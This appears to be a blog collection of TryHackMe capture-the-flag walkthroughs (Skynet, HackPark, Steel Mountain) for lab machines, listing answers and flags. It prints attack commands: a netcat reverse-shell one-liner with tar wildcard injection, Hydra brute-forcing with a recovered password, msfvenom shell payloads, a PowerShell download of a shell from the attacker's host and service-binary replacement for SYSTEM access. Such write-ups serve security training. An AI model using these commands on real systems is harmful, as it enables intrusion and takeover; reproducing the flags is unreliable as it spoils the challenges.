thm-terminator-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called terminator at

Hasta la vista, baby.

Are you able to compromise this Terminator themed machine?

You can follow our official walkthrough for this challenge on our blog.


#1 What is Miles password for his emails?
cyborg007haloterminator
#2 What is the hidden directory?
#3 What is the vulnerability called when you can include a remote file for malicious purposes?
remote file inclusion
#4 What is the user flag?
#5 What is the root flag?
3f0372db24753accc7179a282cd6a949

Skynet Writeup

Skynet Writeup
Follow along with this writeup, and deploy your own instance of Skynet! https://tryhackme.com/room/skynet
Summary:

  • Scan ports using nmap
  • Use GoBuster to enumerate directories
  • Experiment with SMBMap to find Samba shares
  • Using enumerated credentials to read emails
  • Exploit CMS RFI vulnerability
  • Exploit tar wildcards for privilege escalation

Lets first begin by enumerating the machine as much as possible, by using nmap.

nmap -sV <ip>

We can see that that there is a web server running, upon visiting we can see the following:

“Skynet” is a artificial neural network-based conscious group mind and artificial general intelligence system

Lets use GoBuster to locate any directories!

gobuster -u http://<ip> -w <wordlist_location> -t 40

Sometimes, we’re confident that there is something to be found and we waste too much time on it. Often, there are rabbit holes that can trip you up. Make sure to take breaks if you get stuck and try different approaches.

Going back to the drawing board, we saw that pop3 and imap ports were open, I wonder what else could be potentially found? Remember what I said above!

SMBMap allows users to enumerate samba share drives across an entire domain. This program is available on all Kali Linux machines. If you don’t have the time or resources to set your own Kali Linux machine up, you can deploy your own and control it within your browser. Check it out.

The scan reveals a share called “anonymous” that has read access. Lets connect to the share and investigate.

smbclient //<ip>/anonymous

Log1.txt contains possible passwords and there is a smb share called milesdyson. We have some potential credentials here… But SSH is disabled! What else can we do?

An earlier GoBuster scan revealed  SquirrelMail!

Gasp! Reading his emails reveals a Samba password reset!

Lets log into Miles’ share and see what interesting things we can find! You should find a file that gives you information about a new CMS.

Visiting the CMS reveals Miles Dysons Personal Page

If you use GoBuster on the /45kra24zxs28v3yd/ directory, you will reveal an /administrator page. This reveals a Cuppa CMS!

Looking at the source code will give you an indication of the CMS’ version. After some online research, there is a public exploit for it! https://www.exploit-db.com/exploits/25971

Get a shell script and change the IP to be your tun0 IP (ifconfig), host it locally using Python, use netcat to listen for a session and then remotely include this shell on the webserver.

The screenshot below explains the correct steps in obtaining a low privilege shell by exploiting the RFI vulnerability! You can download a PHP reverse shell from PentestMonkey.

So whats actually going on here? In the CMS code, there is a bit of PHP code that includes files:

<?php include($_REQUEST["urlConfig"]); ?>

However, this allows us to include our own shells (or even include a file on the system such as /etc/passwd). For a more detailed explanation, please read the exploit-db description.

Now that we have a shell, we can get the user flag. Next step is to escalate our privileges to root!

Upon enumerating the Linux machine, we can see there are several regular cronjobs running.

So the file /home/milesdyson/backups/backup.sh is being called every minute. Inspecting this file:

This gets a shell, navigates to the /var/www/html directory and create a backup of everything in the directory.

Well, believe it or not, this creates a vulnerability as we can use it to  execute code. HelpNetSecurity best explains how this vulnerability works, but in essence, tar has wildcards and we can use checkpoint actions to execute commands.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip>
1234 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

Then open up a netcat session and you will receive a shell as root!

thm-hackpark-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called hackpark at

Connect to our network and deploy this machine. Please be patient as this machine can take up to 5 minutes to boot! You can test if you are connected to our network, by going to our access page. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

This room will cover brute-forcing an accounts credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.


#1 Deploy the machine and access its web server.
#2 Whats the name of the clown displayed on the homepage?

 

[Task 2] Using Hydra to brute-force a login

Hydra is a parallelized, fast and flexible login cracker. If you don’t have Hydra installed or need a Linux machine to use it, you can deploy a powerful Kali Linux machine and control it in your browser!

Brute-forcing can be trying every combination of a password. Dictionary-attack’s are also a type of brute-forcing, where we iterating through a wordlist to obtain the password.


#1 We need to find a login page to attack and identify what type of request the form is making to the webserver. Typically, web servers make two types of requests, a GET request which is used to request data from a webserver and a POST request which is used to send data to a server.

You can check what request a form is making by right clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found here).

What request type is the Windows website login form using?

#2 Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.

Run the following command but fill in the blanks:

hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form

Guess a username, choose a password wordlist and gain credentials to a user account!

#3 Hydra really does have lots of functionality, and there are many “modules” available (an example of a module would be the http-post-form that we used above).

However, this tool is not only good for brute-forcing HTTP forms, but other protocols such as FTP, SSH, SMTP, SMB and more.

Below is a mini cheatsheet:

Command Description
hydra -P <wordlist> -v <ip> <protocol> Brute force against a protocol of your choice
hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol> You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)
hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip> Attack a Windows Remote Desktop with a password list.
hydra -l <username> -P .<password list> $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’ Craft a more specific request for Hydra to brute force.

Login brute force with Hydra

The website has a login section. TryHackMe prompts us to guess a user name, so we’ll use good old “admin”. Here’s the Hydra command to brute-force the web form:

E:\PENTEST\thc-hydra>hydra -l admin -P rock.txt 10.10.140.111 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ESusfeeAgg5XBAqn0il8cmjNBRNgyyn40k5fTw0EqohxNhMx%2BCbwAu%2FbXDgB%2BeAzswA0lJQlx7qkuILGVgmrciakyHYQksatA0zD%2B%2FQuEbsGFiAEtKJ9foI4CfgcdADkjq%2FYtzt5fJ9wn4Vzq%2Ff%2F%2Bj%2BttNl2bQGbn9kHIOWbeVecULsFeXHxIXw%2F6IDy3MT2DZbc8ScPbiJqkB9NP91hyX6QOlcbAOih9lnzG4%2B69SszAzzAeW5Jt2zIdFJeXmswYiGlaNLvW1zm%2BLW5bMbR2HxMImHT5PipZegaMiNIs4gt6r9RH53qbh0ysABzLfpXlfWT5noJGq%2BhnOUYfAjJC1pnawT1wACYrH6wtRS7oCuKVTQD&__EVENTVALIDATION=iNrpLaCNYEuyJut8PS4B4E3PjQdZpobW1J6AnunCxl%2FNDwPNiZz3gj3VqybxORpHJasanlkFY8Dp3JM8U%2ByD8K4B%2Bp4j7tOAsPbMF1EVjsn4rxuEXIlFgq7uUEefXKTWB0k3zhuIcl%2BcJqFBFUGXy1CVeZ8tuqW7wLkmhrAcuzSGavTs&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-06-03 19:49:39
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:0), ~6 try per task
[DATA] attacking http-post-form://10.10.140.111:80/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ESusfeeAgg5XBAqn0il8cmjNBRNgyyn40k5fTw0EqohxNhMx%2BCbwAu%2FbXDgB%2BeAzswA0lJQlx7qkuILGVgmrciakyHYQksatA0zD%2B%2FQuEbsGFiAEtKJ9foI4CfgcdADkjq%2FYtzt5fJ9wn4Vzq%2Ff%2F%2Bj%2BttNl2bQGbn9kHIOWbeVecULsFeXHxIXw%2F6IDy3MT2DZbc8ScPbiJqkB9NP91hyX6QOlcbAOih9lnzG4%2B69SszAzzAeW5Jt2zIdFJeXmswYiGlaNLvW1zm%2BLW5bMbR2HxMImHT5PipZegaMiNIs4gt6r9RH53qbh0ysABzLfpXlfWT5noJGq%2BhnOUYfAjJC1pnawT1wACYrH6wtRS7oCuKVTQD&__EVENTVALIDATION=iNrpLaCNYEuyJut8PS4B4E3PjQdZpobW1J6AnunCxl%2FNDwPNiZz3gj3VqybxORpHJasanlkFY8Dp3JM8U%2ByD8K4B%2Bp4j7tOAsPbMF1EVjsn4rxuEXIlFgq7uUEefXKTWB0k3zhuIcl%2BcJqFBFUGXy1CVeZ8tuqW7wLkmhrAcuzSGavTs&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[80][http-post-form] host: 10.10.140.111   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-06-03 19:49:52

E:\PENTEST\thc-hydra>
Don’t panic, it’s not really complicated

Most of the command consists of the string after “http-post-form”. This string has three parts divided by colons — “path to the login form page : request body : error message indicating failure”

To get this information open the networks tab in the developer tools, send one login request with random credentials and inspected it by clicking “Edit and Resend”.



The request body can be found in the “Request Body” section at the bottom. Before pasting it in the terminal we need to find where the credentials are used, so hydra would know to insert it’s guessing there.

Now I can replace the “asdf” I entered with ^USER^ and ^PASS^ for Hydra

One last piece of information Hydra needs is a message indicating failure, so it could tell when the guessed password is correct. At login failure, the site prompts us with “Login failed”. That’s exactly the string We need.

After running Hydra and obtaining the password We can log into BlogEngine as admin 🔥

.

In this task, you will identify and execute a public exploit (from exploit-db.com) to get initial access on this Windows machine!

Exploit-Database is a CVE (common vulnerability and exposures) archive of public exploits and corresponding vulnerable software, developed for the use of penetration testers and vulnerability researches. It is owned by Offensive Security (who are responsible for OSCP and Kali)


#1 Now you have logged into the website, are you able to identify the version of the BlogEngine?
#2 Use the exploit database archive to find an exploit to gain a reverse shell on this system.

What is the CVE?

#3 Using the public exploit, gain initial access to the server.

Who is the webserver running as?

.

In this task we will learn about the basics of Windows Privilege Escalation.

First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.


#1 Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.

If you don’t know how to do this, I suggest completing up to task 3 in our Metasploit room first!

Tip: You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually!

#2 You can run metasploit commands such as sysinfo to get detailed information about the Windows system. Then feed this information into the windows-exploit-suggester script and quickly identify any obvious vulnerabilities.

What is the OS version of this windows machine?

#3 Further enumerate the machine.

What is the name of the abnormal service running?

#4 What is the name of the binary you’re supposed to exploit?
#5 Using this abnormal service, escalate your privileges!

What is the user flag (on Jeffs Desktop)?

#6 What is the root flag?

In this task we will escalate our privileges without the use of meterpreter/metasploit!

Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell.

Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.


#1 Now we can generate a more stable shell using msfvenom, instead of using a meterpreter, This time let’s set our payload to windows/shell_reverse_tcp
#2 After generating our payload we need to pull this onto the box using powershell.

Tip: It’s common to find C:\Windows\Temp is world writable!
#3 Now you know how to pull files from your machine to the victims machine, we can pull winPEAS.bat to the system using the same method! (You can find winPEAS here)

WinPeas is a great tool which will enumerate the system and attempt to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!

Tip: You can execute these files by using .\filename.exe

Using winPeas, what was the Original Install time of the server ? (This is date and time) ,Found from cmd-shell with : systeminfo

Writeup :

Try it for yourself here.

Deployment and reverse image search

After the machine deployed I opened the website and got prompted by this friendly clown:

I guess most of you recognized him right off the bat as Pennywise from the Movie IT. I didn’t, so I used reverse image search to find who he is. Google didn’t provide any good output, but TinEye did.

Login brute force with Hydra

The website has a login section. TryHackMe prompts us to guess a user name, so we’ll use good old “admin”. Here’s the Hydra command to brute-force the web form:

Don’t panic, it’s not really complicated

Most of the command consists of the string after “http-post-form”. This string has three parts divided by colons — “path to the login form page : request body : error message indicating failure”

To get this information open the networks tab in the developer tools, send one login request with random credentials and inspected it by clicking “Edit and Resend”.

The request body can be found in the “Request Body” section at the bottom. Before pasting it in the terminal we need to find where the credentials are used, so hydra would know to insert it’s guessing there.

Now I can replace the “asdf” I entered with ^USER^ and ^PASS^ for Hydra

One last piece of information Hydra needs is a message indicating failure, so it could tell when the guessed password is correct. At login failure, the site prompts us with “Login failed”. That’s exactly the string We need.

After running Hydra and obtaining the password We can log into BlogEngine as admin 🔥

Compromise the machine

The first thing to be done is to check the version of BlogEngine. It can be found in the “About” tab. A quick google search of this version revealed this exploit in exploit-db.

Example search for an exploit with the “searchsploit” command on Kali Linux. We’ll use the fourth result.

Inside the exploit, a comment specified exactly what we needed to do to get this running. Firstly change the address and port of the attacker to yours.

Rename the exploit to PostView.ascx. It should be uploaded via editing a post:

To upload the file edit the only post on the website and click the folder icon marked above

To get the reverse shell we only need to start a Netcat listener and navigate to http://10.10.147.54/?theme=../../App_Data/files

There is nothing prettier than getting a reverse shell

By running whoami we see that the server is running as “iis apppool\blog”.

Privilege Escalation [without Metasploit]

Before scanning the machine to find a way to escalate privileges, Let’s get a stable shell. We will create a reverse shell executable with msfvenom:

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=[your_ip] LPORT=[listening_port] -f exe -o [shell_name.exe]

Now the payload is ready. Start a small server so the machine would be able to download the executable with python3 -m http.server.

We don’t have write permissions to the current folder, so before downloading navigate to C:\Windows\Temp. To download use this command:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://[your_ip]:[listening_port]/[shell_name.exe]')"

amazing. Now listen on the port you specified previously and run the executable.

A stable reverse shell

The same way we sent this reverse shell we can send an enumeration script. I used winPEAS.

Analyzing the results of the enumeration took a while. Under the “Running Processes” section exists a service name “Message.exe”. Further inspection shows that it keeps on running and stopping repeatedly. If we can replace Message.exe with our reverse shell script we can get a shell with higher privileges.

Message.exe can be found under C:\Program Files (x86)\SystemScheduler. Rename Message.exe to Message.bak, send your shell and rename it to Message.exe. Don’t forget to listen on the port you specified!

Wait for a little, and voila! we have a shell. running whoami returns:

These permissions are enough to access both “jeff” and “Administrator” that hold the user and root flags.

Author: Jacco Straathof

Protected: htb-magic-nl

This content is password protected. To view it please enter your password below:

Posted on

thm-steelmountain-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play  Tryhackme’s Steelmountain at

https://tryhackme.com/room/gatekeeper

Credits to the room creator/s.

TryHackMe – Steel Mountain

[Task 1] Introduction

In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.


#1 Deploy the machine.

Who is the employee of the month?

.

[Task 2] Initial Access

Now you have deployed the machine, lets get an initial shell!


#1 Scan the machine with nmap. What is the other port running a web server on?
#2 Take a look at the other web server. What file server is running?
#3 What is the CVE number to exploit this file server?
#4 Use Metasploit to get an initial shell. What is the user flag?

[Task 3] Privilege Escalation

Now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root!


#1 To enumerate this machine, we will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities – “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:

#2 Take close attention to the CanRestart option that is set to true. What is the name of the unquoted service path service name?
#3 The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

Use msfvenom to generate a reverse shell as an Windows executable.

Upload your binary and replace the legitimate one. Then restart the program to get a shell as root.

#4 What is the root flag?

[Task 4] Access and Escalation Without Metasploit

Now let’s complete the room without the use of Metasploit.

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to


#1 To begin we shall be using the same CVE. However, this time let’s use this exploit.

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

#2 Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

Once we run winPeas, we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.

What powershell -c command could we run to manually find out the service name?

*Format is “powershell -c “command here”*

#3 Now let’s escalate to Administrator with our new found knowledge.

Generate your payload using msfvenom and pull it to the system using powershell.

Now we can move our payload to the unquoted directory winPEAS alerted us to and restart the service with two commands.

First we need to stop the service which we can do like so;

sc stop AdvancedSystemCareService9

Shortly followed by;

sc start AdvancedSystemCareService9

Once this command runs, you will see you gain a shell as Administrator on our listener!

.

Here’s the writeup :

As always we start with a nmap scan

kali@kali:~/thm$ nmap -A 10.10.55.161 -oN steelmountain.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-17 03:30 EDT
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.92% done; ETC: 03:31 (0:00:00 remaining)
Stats: 0:01:49 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 03:31 (0:00:00 remaining)
Nmap scan report for 10.10.55.161
Host is up (0.029s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-04-17T07:31:14+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:88:1e:b5:04:44 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2020-04-17T07:31:09
|_ start_date: 2020-04-17T06:48:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.78 seconds
kali@kali:~/thm$

.

.

msf5 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.11.3.122:4444 
[*] Using URL: http://0.0.0.0:8080/PDRAuFa4r7C8h
[*] Local IP: http://192.168.1.113:8080/PDRAuFa4r7C8h
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /PDRAuFa4r7C8h
[*] Sending stage (180291 bytes) to 10.10.55.161
[*] Meterpreter session 1 opened (10.11.3.122:4444 -> 10.10.55.161:62506) at 2020-04-17 02:50:52 -0400
[!] Tried to delete %TEMP%\MGKQmXpmJuEcFF.vbs, unknown result
[*] Server stopped.

meterpreter > cd /users
meterpreter > cd bill
meterpreter > cd desktop
meterpreter > ls
Listing: C:\users\bill\desktop
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-09-27 07:07:07 -0400 desktop.ini
100666/rw-rw-rw- 70 fil 2019-09-27 08:42:38 -0400 user.txt

meterpreter > cat user.txt
b04763b6fcf51fcd7c13abc7db4fd365

.

To enumerate this machine, we will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities – “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:

added Invoke-AllChecks to bottom of PowerUp.ps1 file
Other way to find this :
My next move was to use wmic to check for Unquoted Service Path. The syntax i used was: wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """.

With this information, i used msfvenom to generate a malicious binary.

kali@kali:~/thm$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.122 LPORT=443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: ASCService.exe

.

I stop the service using Service Control.

Now, i uploaded the binary to C:\Program Files (x86)\IObit. Before starting the service, create a netcat listener, then drop into a shell and start the service with Service Control (sc start AdvancedSystemCareService9).

I received the reverse shell. Now, if we want to upgrade our shell, we can use metasploit Web Delivery module as follows.

image [Web delivery] here

Web delivery configuration

I already had it pre configured. I just changed a few things. Also, don’t forget to use the PSH (set target 2) delivery. Now, just copy-paste it in your generic shell you spawned earlier and hit enter. You’ll receive the connection in metasploit.

You upgraded the shell. Now you can run hashdump, pivot if needed and so on.

C:\users\bill\desktop>wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """
Advanced SystemCare Service 9 AdvancedSystemCareService9 C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe Auto 
Application Host Helper Service AppHostSvc C:\Windows\system32\svchost.exe -k apphost Auto 
AWS Lite Guest Agent AWSLiteAgent C:\Program Files\Amazon\XenTools\LiteAgent.exe Auto 
Base Filtering Engine BFE C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork Auto 
Background Tasks Infrastructure Service BrokerInfrastructure C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
Cryptographic Services CryptSvc C:\Windows\system32\svchost.exe -k NetworkService Auto 
DCOM Server Process Launcher DcomLaunch C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
DHCP Client Dhcp C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
DNS Client Dnscache C:\Windows\system32\svchost.exe -k NetworkService Auto 
Wired AutoConfig dot3svc C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted Manual 
Diagnostic Policy Service DPS C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork Auto 
Windows Event Log EventLog C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted Auto 
COM+ Event System EventSystem C:\Windows\system32\svchost.exe -k LocalService Auto 
Windows Font Cache Service FontCache C:\Windows\system32\svchost.exe -k LocalService Auto 
Group Policy Client gpsvc C:\Windows\system32\svchost.exe -k netsvcs Auto 
IKE and AuthIP IPsec Keying Modules IKEEXT C:\Windows\system32\svchost.exe -k netsvcs Auto 
IObit Uninstaller Service IObitUnSvr C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe Auto 
IP Helper iphlpsvc C:\Windows\System32\svchost.exe -k NetSvcs Auto 
Server LanmanServer C:\Windows\system32\svchost.exe -k netsvcs Auto 
Workstation LanmanWorkstation C:\Windows\System32\svchost.exe -k NetworkService Auto 
LiveUpdate LiveUpdateSvc C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe Auto 
TCP/IP NetBIOS Helper lmhosts C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
Windows Firewall MpsSvc C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork Auto 
Distributed Transaction Coordinator MSDTC C:\Windows\System32\msdtc.exe Auto 
Network Location Awareness NlaSvc C:\Windows\System32\svchost.exe -k NetworkService Auto 
Network Store Interface Service nsi C:\Windows\system32\svchost.exe -k LocalService Auto 
Power Power C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
User Profile Service ProfSvc C:\Windows\system32\svchost.exe -k netsvcs Auto 
Remote Access Auto Connection Manager RasAuto C:\Windows\System32\svchost.exe -k netsvcs Manual 
Remote Registry RemoteRegistry C:\Windows\system32\svchost.exe -k localService Auto 
RPC Endpoint Mapper RpcEptMapper C:\Windows\system32\svchost.exe -k RPCSS Auto 
Remote Procedure Call (RPC) RpcSs C:\Windows\system32\svchost.exe -k rpcss Auto 
Security Accounts Manager SamSs C:\Windows\system32\lsass.exe Auto 
Task Scheduler Schedule C:\Windows\system32\svchost.exe -k netsvcs Auto 
System Event Notification Service SENS C:\Windows\system32\svchost.exe -k netsvcs Auto 
Shell Hardware Detection ShellHWDetection C:\Windows\System32\svchost.exe -k netsvcs Auto 
Print Spooler Spooler C:\Windows\System32\spoolsv.exe Auto 
Software Protection sppsvc C:\Windows\system32\sppsvc.exe Auto 
System Events Broker SystemEventsBroker C:\Windows\system32\svchost.exe -k DcomLaunch Auto 
Themes Themes C:\Windows\System32\svchost.exe -k netsvcs Auto 
Distributed Link Tracking Client TrkWks C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted Auto 
User Access Logging Service UALSVC C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted Auto 
World Wide Web Publishing Service W3SVC C:\Windows\system32\svchost.exe -k iissvcs Auto 
Windows Connection Manager Wcmsvc C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted Auto 
WinHTTP Web Proxy Auto-Discovery Service WinHttpAutoProxySvc C:\Windows\system32\svchost.exe -k LocalService Manual 
Windows Management Instrumentation Winmgmt C:\Windows\system32\svchost.exe -k netsvcs Auto 
Windows Remote Management (WS-Management) WinRM C:\Windows\System32\svchost.exe -k NetworkService Auto 
Windows Licensing Monitoring Service WLMS C:\Windows\system32\wlms\wlms.exe Auto

C:\users\bill\desktop>cd C:\Program Files (x86)\IObit\Advanced SystemCare\
cd C:\Program Files (x86)\IObit\Advanced SystemCare\

C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING 
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0

C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
[SC] ControlService FAILED 1062:

The service has not been started.


C:\Program Files (x86)\IObit\Advanced SystemCare>^Z
Background channel 3? [y/N] y
meterpreter > upload ascservice.exe
[*] uploading : ascservice.exe -> ascservice.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): ascservice.exe -> ascservice.exe
[*] uploaded : ascservice.exe -> ascservice.exe
meterpreter > shell
Process 3640 created.
Channel 5 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\users\bill\desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A

Directory of C:\users\bill\desktop

04/16/2020 11:58 PM <DIR> .
04/16/2020 11:58 PM <DIR> ..
04/16/2020 11:58 PM 73,802 ascservice.exe
09/27/2019 05:42 AM 70 user.txt
2 File(s) 73,872 bytes
2 Dir(s) 44,160,622,592 bytes free

C:\users\bill\desktop>copy ascservice.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe"
copy ascservice.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe"
Overwrite C:\Program Files (x86)\IObit\Advanced SystemCare\ascservice.exe? (Yes/No/All): A
A
1 file(s) copied.

C:\users\bill\desktop>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.
..
kali@kali:~$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.55.161] 62551
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A

Directory of c:\Users\Administrator\Desktop

09/27/2019 05:41 AM <DIR> .
09/27/2019 05:41 AM <DIR> ..
09/27/2019 05:41 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 44,262,805,504 bytes free

c:\Users\Administrator\Desktop>type root.txt
type root.txt
9af5f314f57607c00fd09803a587db80
c:\Users\Administrator\Desktop>

Now let’s complete the room without the use of Metasploit.

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to


